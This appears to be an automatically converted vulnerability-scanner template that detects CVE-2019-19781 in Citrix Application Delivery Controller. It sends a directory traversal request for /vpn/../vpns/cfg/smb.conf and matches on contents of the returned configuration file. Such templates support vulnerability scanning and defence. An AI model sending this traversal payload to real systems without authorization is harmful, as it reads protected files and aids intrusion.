id: yaml-poc-citrix-application_delivery_controller-directory_traversal-CVE-2019-19781
info:
  name: Yaml Poc Citrix Application_Delivery_Controller Directory_Traversal Cve 2019
    19781
  author: converted
  severity: critical
  description: 'Converted from xpoc: yaml-poc-citrix-application_delivery_controller-directory_traversal-CVE-2019-19781'
  tags: citrix,traversal,cve
  classification:
    cve-id: CVE-2019-19781
  reference:
  - http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
  - http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
  - http://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html
  - http://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html
  - http://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html
http:
- method: GET
  path:
  - /vpn/../vpns/cfg/smb.conf
  redirects: false
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - encrypt passwords
    - name resolve order
